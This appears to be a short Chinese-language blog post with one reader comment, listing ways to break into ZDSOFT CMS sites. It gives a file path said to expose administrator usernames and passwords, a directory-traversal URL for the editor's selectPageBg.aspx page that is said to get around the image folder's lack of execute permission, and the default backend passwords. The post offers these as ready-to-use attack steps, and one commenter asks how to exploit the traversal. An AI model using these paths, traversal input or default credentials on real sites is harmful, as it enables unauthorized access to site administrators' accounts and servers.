ZDSOFT 漏洞

/images/database/admin.xml
可以看到管理用户账户密码
editor/dialog/selectPageBg.aspx?position=&directory=..
变量directory是路径,..表示跟目录,绕过Image目录无执行权限
后台默认密码:zdsoft 123 zdsoft admin

1 条评论

  1. 1B

    editor/dialog/selectPageBg.aspx?position=&directory=..这个怎么利用呢? :roll:

发表评论